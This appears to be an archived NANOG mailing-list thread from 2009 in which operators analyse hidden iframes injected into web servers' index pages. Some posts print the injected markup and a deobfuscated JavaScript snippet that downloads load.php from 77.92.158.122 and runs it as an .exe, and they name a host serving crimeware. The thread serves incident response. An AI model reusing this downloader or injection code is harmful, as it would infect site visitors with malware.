RE: Malicious code just found on web server
We have seen this twice recentlywe have tracked it back to a worm which steals unencrypted ftp information from a desktop. We tracked it down because it occured on 7 or 8 sites that were on different servers both Linux and Windows...some had no database associated with them. The only common thing on these sites was they all had the same web developer, she confirmed she was using filezilla which does not encrypt the passwords she also confirmed that she had found a virus/worm on her machine a few weeks before. The same thing was found on other websites that she maintained that we did not host. FTP logs confirmed that a bot was making the changes through FTP. The bot seems to inject a java script and IFrame in all pages that are named index.* - it changed HTML, php and asp extensions. Chuck Schick Warp 8, Inc. (303)-421-5140 www.warp8.com -Original Message- From: Mike Lewinski [mailto:m...@rockynet.com] Sent: Monday, April 20, 2009 11:23 AM To: nanog@nanog.org Subject: Re: Malicious code just found on web server Paul Ferguson wrote: Most likely SQL injection. At any given time, there are hundreds of thousands of legitimate websites out there that are unwittingly harboring malicious code. Most of the MS-SQL injection attacks we see write malicious javascript into the DB itself so all query results include it. However, I'm not sure how easy it is to leverage to get system access - we've seen a number of compromised customer machines and there didn't appear to be any further compromise of them beyond the obvious. In the OP's case it sounds like static HTML files were altered. My bet is that an ftp or ssh account was brute forced. Mike
Re: Malicious code just found on web server
Date: Mon, 20 Apr 2009 10:52:57 -0700 From: Paul Ferguson fergdawgs...@gmail.com On Mon, Apr 20, 2009 at 10:40 AM, Nick Chapman nicknetwo...@gmail.com wrote: On Mon, Apr 20, 2009 at 12:47 PM, Neil kngsp...@gmail.com wrote: But if you figure out how they got write access to a static website, I'd love to hear it. Compromised FTP credentials would be my guess. They can be obtained by brute force attacks or credential stealing trojans. Yeah, it could have been any number of ways -- there has also been a huge increase of SSH brute-force attacks in the past few weeks: https://isc.sans.org/diary.html?storyid=6214 And, from several reports (including my own), they (brute force ssh attacks) seem to have stopped at about 22:30 UTC on the 19th. (Not that this is really relevant to the thread.) -- R. Kevin Oberman, Network Engineer Energy Sciences Network (ESnet) Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab) E-mail: ober...@es.net Phone: +1 510 486-8634 Key fingerprint:059B 2DDF 031C 9BA3 14A4 EADA 927D EBB3 987B 3751
Re: Malicious code just found on web server
On 21/04/2009, at 5:23 AM, Mike Lewinski wrote: Paul Ferguson wrote: Most likely SQL injection. At any given time, there are hundreds of thousands of legitimate websites out there that are unwittingly harboring malicious code. Most of the MS-SQL injection attacks we see write malicious javascript into the DB itself so all query results include it. However, I'm not sure how easy it is to leverage to get system access - we've seen a number of compromised customer machines and there didn't appear to be any further compromise of them beyond the obvious. In the OP's case it sounds like static HTML files were altered. My bet is that an ftp or ssh account was brute forced. I have seen a couple of open source web apps (CMSs, etc.) that store names of php files in a database, and those files names are then opened with fopen. SQL injection could be used to write a URL in to the database, and then wait for that entry to be called, and viola, you can execute php code, or whatever. Obviously that is relevant to the first part of your reply - it would not work with static content. -- Nathan Ward
Re: Malicious code just found on web server
Paul, I noticed that in the PDF file but as the domain doesn't seem to have resolution I didn't mention it. Jake WHOIS information on the domain Whois Record domain: TEST1.RU type: CORPORATE nserver:ns1.centerhost.ru. nserver:ns1.cetis.ru. state: REGISTERED, DELEGATED org:Center of Effective Technologies and Systems CETIS phone: +7 4957711654 fax-no: +7 4957879251 e-mail: http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a e-mail: http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff registrar: REGRU-REG-RIPN created:2001.03.30 paid-till: 2010.04.03 source: TC-RIPN Registry Data Created: 2001-03-30 Expires: 2010-04-03 Whois Server: whois.ripn.net Server Data Domain Status: Registered And No Website On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson fergdawgs...@gmail.comwrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills securin...@gmail.com wrote: I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54 That javascript writes this to the page (URL obscured): document.write(embed src=\hXXp:// 77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown%7C U nknown|US|1.2.3.4\ width=\0\ height=\0\ type=\application/pdf\/embed); The 1.2.3.4 in the URL is my public IP address (I changed that). Below the javascript, it grabs a PDF: embed src=include/two.pdf width=1 height=0 style=border:none/embed That PDF is on the site, I haven't looked at it yet though. Not only is that .pdf malicious, when executed it also fetches additional malware from: hxxp:// test1.ru /1.1.1/load.php If that host is not in your block list, it should be -- known purveyor of crimeware. This is in addition to the other malicious URLs mentioned in this thread. - - ferg -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI mxM8Ci/feKnJe6M6qbiESPw= =b0Yj -END PGP SIGNATURE- -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server 13E-7EB
On Mon, Apr 20, 2009 at 10:42 AM, Jake Mailinglists jbabbinli...@gmail.comwrote: Paul, I noticed that in the PDF file but as the domain doesn't seem to have resolution I didn't mention it. Jake WHOIS information on the domain Whois Record domain: TEST1.RU type: CORPORATE nserver:ns1.centerhost.ru. nserver:ns1.cetis.ru. state: REGISTERED, DELEGATED org:Center of Effective Technologies and Systems CETIS phone: +7 4957711654 fax-no: +7 4957879251 e-mail: http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a e-mail: http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff registrar: REGRU-REG-RIPN created:2001.03.30 paid-till: 2010.04.03 source: TC-RIPN Registry Data Created: 2001-03-30 Expires: 2010-04-03 Whois Server: whois.ripn.net Server Data Domain Status: Registered And No Website On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson fergdawgs...@gmail.comwrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills securin...@gmail.com wrote: I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54 That javascript writes this to the page (URL obscured): document.write(embed src=\hXXp:// 77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown%7C U nknown|US|1.2.3.4\ width=\0\ height=\0\ type=\application/pdf\/embed); The 1.2.3.4 in the URL is my public IP address (I changed that). Below the javascript, it grabs a PDF: embed src=include/two.pdf width=1 height=0 style=border:none/embed That PDF is on the site, I haven't looked at it yet though. Not only is that .pdf malicious, when executed it also fetches additional malware from: hxxp:// test1.ru /1.1.1/load.php If that host is not in your block list, it should be -- known purveyor of crimeware. This is in addition to the other malicious URLs mentioned in this thread. - - ferg -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI mxM8Ci/feKnJe6M6qbiESPw= =b0Yj -END PGP SIGNATURE- -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server
On Fri, Apr 17, 2009 at 4:39 PM, Russell Berg b...@wins.net wrote: We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today: src=http://77.92.158.122/webmail/inc/web/index.php; style=display: none; height=0 width=0/iframe iframe src=http://77.92.158.122/webmail/inc/web/index.php; style=display: none; height=0 width=0/iframe /body /html IP address resolves to mail.yaris.com; couldn't find any A/V site references to this. Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation. Just a heads up for folks; we have a team investigating... Russell Berg Dir - Product Development Airstream Communications b...@wins.net 715-832-3726 I've run into this sort of attack before, where they change the page to load content from elsewhere; but I couldn't figure out how they managed to write to the sites' pages. They were hosted on a commercial webhost, and so if it was a compromised host (which seemed like the only possibility to me), that didn't speak well for the hosting company. We were having issues with the company anyways, though; so I took down the site, sanitized the pages (and removed a bunch of junk), and put the site back up with another company. But if you figure out how they got write access to a static website, I'd love to hear it. -N.
Re: Malicious code just found on web server
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Mon, Apr 20, 2009 at 9:47 AM, Neil kngsp...@gmail.com wrote: I've run into this sort of attack before, where they change the page to load content from elsewhere; but I couldn't figure out how they managed to write to the sites' pages. They were hosted on a commercial webhost, and so if it was a compromised host (which seemed like the only possibility to me), that didn't speak well for the hosting company. We were having issues with the company anyways, though; so I took down the site, sanitized the pages (and removed a bunch of junk), and put the site back up with another company. But if you figure out how they got write access to a static website, I'd love to hear it. Most likely SQL injection. At any given time, there are hundreds of thousands of legitimate websites out there that are unwittingly harboring malicious code. - - ferg -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ7KtQq1pz9mNUZTMRAssaAKDYN8gqpZFaYPBOofGTjdtIbCDcSQCglwP0 W1CxTsNRR8vhO28Tq1LDm7M= =TJbX -END PGP SIGNATURE- -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server
Paul Ferguson wrote: Most likely SQL injection. At any given time, there are hundreds of thousands of legitimate websites out there that are unwittingly harboring malicious code. Most of the MS-SQL injection attacks we see write malicious javascript into the DB itself so all query results include it. However, I'm not sure how easy it is to leverage to get system access - we've seen a number of compromised customer machines and there didn't appear to be any further compromise of them beyond the obvious. In the OP's case it sounds like static HTML files were altered. My bet is that an ftp or ssh account was brute forced. Mike
Re: Malicious code just found on web server
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Mon, Apr 20, 2009 at 10:23 AM, Mike Lewinski m...@rockynet.com wrote: Paul Ferguson wrote: Most likely SQL injection. At any given time, there are hundreds of thousands of legitimate websites out there that are unwittingly harboring malicious code. Most of the MS-SQL injection attacks we see write malicious javascript into the DB itself so all query results include it. However, I'm not sure how easy it is to leverage to get system access - we've seen a number of compromised customer machines and there didn't appear to be any further compromise of them beyond the obvious. In the OP's case it sounds like static HTML files were altered. My bet is that an ftp or ssh account was brute forced. Yes -- SQL Injection directly into the HTML. Happening all over the place, hundreds of thousands at a time --- we've been trying to highlight the fact that improper configuration of web services, unescaped configurations, etc., allow SQL injection to insert code (e.g. JavaScript, iFrames, etc.) directly into the HTML or Header. See also: http://en.wikipedia.org/wiki/Sql_injection#Real-world_examples - - ferg -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ7LKiq1pz9mNUZTMRAu3sAJ9MB6NH+qn8/idSbfqMk8TRQPzy5gCfb/QY DUCdgzPRORtsLyfDFrfkgTw= =Ar/O -END PGP SIGNATURE- -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Mon, Apr 20, 2009 at 10:40 AM, Nick Chapman nicknetwo...@gmail.com wrote: On Mon, Apr 20, 2009 at 12:47 PM, Neil kngsp...@gmail.com wrote: But if you figure out how they got write access to a static website, I'd love to hear it. Compromised FTP credentials would be my guess. They can be obtained by brute force attacks or credential stealing trojans. Yeah, it could have been any number of ways -- there has also been a huge increase of SSH brute-force attacks in the past few weeks: https://isc.sans.org/diary.html?storyid=6214 - - ferg -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ7LZrq1pz9mNUZTMRAvjkAJ9FLDn/KsLDrW9uIveQEw23ojaFbQCg7T6C LZo3kISAfgBAfdbRSgUd878= =vQAP -END PGP SIGNATURE- -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
Malicious code just found on web server
We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today: src=http://77.92.158.122/webmail/inc/web/index.php; style=display: none; height=0 width=0/iframe iframe src=http://77.92.158.122/webmail/inc/web/index.php; style=display: none; height=0 width=0/iframe /body /html IP address resolves to mail.yaris.com; couldn't find any A/V site references to this. Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation. Just a heads up for folks; we have a team investigating... Russell Berg Dir - Product Development Airstream Communications b...@wins.net 715-832-3726
RE: Malicious code just found on web server
FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com -Original Message- From: Russell Berg Sent: Friday, April 17, 2009 3:39 PM To: 'nanog@nanog.org' Subject: Malicious code just found on web server We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today: src=http://77.92.158.122/webmail/inc/web/index.php; style=display: none; height=0 width=0/iframe iframe src=http://77.92.158.122/webmail/inc/web/index.php; style=display: none; height=0 width=0/iframe /body /html IP address resolves to mail.yaris.com; couldn't find any A/V site references to this. Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation. Just a heads up for folks; we have a team investigating... Russell Berg Dir - Product Development Airstream Communications b...@wins.net 715-832-3726
Re: Malicious code just found on web server
I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54 That javascript writes this to the page (URL obscured): document.write(embed src=\hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\ width=\0\ height=\0\ type=\application/pdf\/embed); The 1.2.3.4 in the URL is my public IP address (I changed that). Below the javascript, it grabs a PDF: embed src=include/two.pdf width=1 height=0 style=border:none/embed That PDF is on the site, I haven't looked at it yet though. -ChrisAM http://securabit.com On Fri, Apr 17, 2009 at 4:42 PM, Russell Berg b...@wins.net wrote: FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com -Original Message- From: Russell Berg Sent: Friday, April 17, 2009 3:39 PM To: 'nanog@nanog.org' Subject: Malicious code just found on web server We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today: src=http://77.92.158.122/webmail/inc/web/index.php; style=display: none; height=0 width=0/iframe iframe src=http://77.92.158.122/webmail/inc/web/index.php; style=display: none; height=0 width=0/iframe /body /html IP address resolves to mail.yaris.com; couldn't find any A/V site references to this. Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation. Just a heads up for folks; we have a team investigating... Russell Berg Dir - Product Development Airstream Communications b...@wins.net 715-832-3726
Re: Malicious code just found on web server
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills securin...@gmail.com wrote: I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54 That javascript writes this to the page (URL obscured): document.write(embed src=\hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|U nknown|US|1.2.3.4\ width=\0\ height=\0\ type=\application/pdf\/embed); The 1.2.3.4 in the URL is my public IP address (I changed that). Below the javascript, it grabs a PDF: embed src=include/two.pdf width=1 height=0 style=border:none/embed That PDF is on the site, I haven't looked at it yet though. Most likely a file that exploits a well-known vulnerability in Adobe Reader, which in turn probably loads malware from yet another location. We've been seeing a lot of this lately. - - ferg -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ6P+Oq1pz9mNUZTMRAgINAJ9nFvTfdP0nNB5IXGCR5U5MKvbBxwCgoZQZ 1dYwVrqBqq9k7RVzAhXtYMY= =bmbW -END PGP SIGNATURE- -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson fergdawgs...@gmail.com wrote: On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills securin...@gmail.com wrote: I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54 That javascript writes this to the page (URL obscured): document.write(embed src=\hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown| U nknown|US|1.2.3.4\ width=\0\ height=\0\ type=\application/pdf\/embed); The 1.2.3.4 in the URL is my public IP address (I changed that). Below the javascript, it grabs a PDF: embed src=include/two.pdf width=1 height=0 style=border:none/embed That PDF is on the site, I haven't looked at it yet though. Most likely a file that exploits a well-known vulnerability in Adobe Reader, which in turn probably loads malware from yet another location. We've been seeing a lot of this lately. Yes, definitely malicious: http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b - - ferg -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w /K0hKsJiAz4RGu8VQkyP+js= =AzJq -END PGP SIGNATURE- -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server
You beat me to it. -ChrisAM On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson fergdawgs...@gmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson fergdawgs...@gmail.com wrote: On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills securin...@gmail.com wrote: I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54 That javascript writes this to the page (URL obscured): document.write(embed src=\hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown| U nknown|US|1.2.3.4\ width=\0\ height=\0\ type=\application/pdf\/embed); The 1.2.3.4 in the URL is my public IP address (I changed that). Below the javascript, it grabs a PDF: embed src=include/two.pdf width=1 height=0 style=border:none/embed That PDF is on the site, I haven't looked at it yet though. Most likely a file that exploits a well-known vulnerability in Adobe Reader, which in turn probably loads malware from yet another location. We've been seeing a lot of this lately. Yes, definitely malicious: http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b - - ferg -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w /K0hKsJiAz4RGu8VQkyP+js= =AzJq -END PGP SIGNATURE- -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server
Nice, bad code is actually on all of the error (404) pages for the site as well as some other php pages. The code is actually a base64 obfuscation technique to hide the actual attack code. Once decode the code attempts multiple attacks to try and get the victim to download an executable hxxp://77.92.158.122/webmail/inc/web/load.php Virustotal results (3/40) http://www.virustotal.com/analisis/180fc9b96543139b8328f2ae0a2d1bf3 Also this code appears to be trying to exploit specific browser types (Chrome and Mozilla in particular) as can be seen from this code snippet of the decode. (Commented out each line just in case someone has a browser that will try and render this) //aaa_2626aKiupwzqp.setAttribute(style, display: none; -moz-binding: url('chrome://xbl-marquee/content/xbl-marquee.xml#marquee-horizontal');); //document.body.appendChild(aaa_2626aKiupwzqp); //var aaa_2626aLiupwzqp = aaa_2626aKiupwzqp.stop.eval.call(null, Function); //var aaa_2626aMiupwzqp = aaa_2626aLiupwzqp(return function(C){ var //file=C.classes['@ mozilla.org/file/local;1'].createInstance(C.interfaces.nsILocalFile); file.initW //ithPath('c:\\ + aaa_2626aHiupwzqp + .exe'); return file; })(); //window.file = aaa_2626aMiupwzqp(Components); //var aaa_2626aNiupwzqp = aaa_2626aLiupwzqp(return function(C){ return C.classes['@ mozilla.org/process/util;1'].createInstance(C.interfaces.nsIProcess); //})(); //window.process = aaa_2626aNiupwzqp(Components); //var aaa_2626aOiupwzqp = aaa_2626aLiupwzqp(return function(C,file){ //io=C.classes['@ mozilla.org/network/io-service;1'].getService(C.interfaces.nsIIOService);source=i //o.newURI('http://77.92.158.122/webmail/inc/web/load.php ','UTF8',null);persist=C.classes['@ mozilla.org/embedding/browser/nsWebBrowserPersist;1'].createI//nstance(C.int //erfaces.nsIWebBrowserPersist);persist.persistFlags=8192|4096;persist.saveURI(source,null,null,null,null,file); return persist; })(); //window.persist = aaa_2626aOiupwzqp(Components,window.file); //window.getState = aaa_2626aLiupwzqp(return function(persist) { return persist.currentState; })(); //window.processRun = aaa_2626aLiupwzqp(return function(process,file) { process.init(file); process.run(false,[],0); })(); Also attempts to download a hostile PDF file from a subdirectory underneath this one which was created with a demo copy of Foxit. hxxp://77.92.158.122/webmail/inc/web/include/two.pdf INFO: Version 2.321001 (possibly) Created: 2009-02-19 1448hrs (-2 timezone) There appear to be several other attacks within this code I can upload or update this thread if you are interested in the other attacks. Jake On Fri, Apr 17, 2009 at 6:34 PM, Chris Mills securin...@gmail.com wrote: You beat me to it. -ChrisAM On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson fergdawgs...@gmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson fergdawgs...@gmail.com wrote: On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills securin...@gmail.com wrote: I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54 That javascript writes this to the page (URL obscured): document.write(embed src=\hXXp:// 77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown%7C U nknown|US|1.2.3.4\ width=\0\ height=\0\ type=\application/pdf\/embed); The 1.2.3.4 in the URL is my public IP address (I changed that). Below the javascript, it grabs a PDF: embed src=include/two.pdf width=1 height=0 style=border:none/embed That PDF is on the site, I haven't looked at it yet though. Most likely a file that exploits a well-known vulnerability in Adobe Reader, which in turn probably loads malware from yet another location. We've been seeing a lot of this lately. Yes, definitely malicious: http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b - - ferg -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w /K0hKsJiAz4RGu8VQkyP+js= =AzJq -END PGP SIGNATURE- -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills securin...@gmail.com wrote: I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54 That javascript writes this to the page (URL obscured): document.write(embed src=\hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown| U nknown|US|1.2.3.4\ width=\0\ height=\0\ type=\application/pdf\/embed); The 1.2.3.4 in the URL is my public IP address (I changed that). Below the javascript, it grabs a PDF: embed src=include/two.pdf width=1 height=0 style=border:none/embed That PDF is on the site, I haven't looked at it yet though. Not only is that .pdf malicious, when executed it also fetches additional malware from: hxxp:// test1.ru /1.1.1/load.php If that host is not in your block list, it should be -- known purveyor of crimeware. This is in addition to the other malicious URLs mentioned in this thread. - - ferg -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI mxM8Ci/feKnJe6M6qbiESPw= =b0Yj -END PGP SIGNATURE- -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/